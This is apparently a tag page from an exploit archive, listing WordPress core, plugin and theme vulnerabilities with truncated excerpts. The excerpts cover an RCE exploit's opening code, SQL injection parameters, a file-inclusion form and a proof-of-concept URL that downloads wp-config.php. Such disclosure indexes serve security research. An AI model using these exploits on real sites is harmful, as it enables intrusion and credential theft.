Current tag

WordPress vulnerabilities

WordPress 5.0 Remote Code Execution

WordPress Core 5.0 - Remote Code Execution Exploit var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ''; var post_id = 0; var cmd = '<!--?php phpinfo();/*'; var ...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST['CatID'] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL Injection

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The GET parameter 'kc_ad' is vulnerable. 2. Proof of conc...

WordPress Force Download Arbitrary File Download Vulnerability

###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 File Inclusion Vulnerability

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

WordPress Karma 4.7 – Responsive Theme Exploit

<?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [...
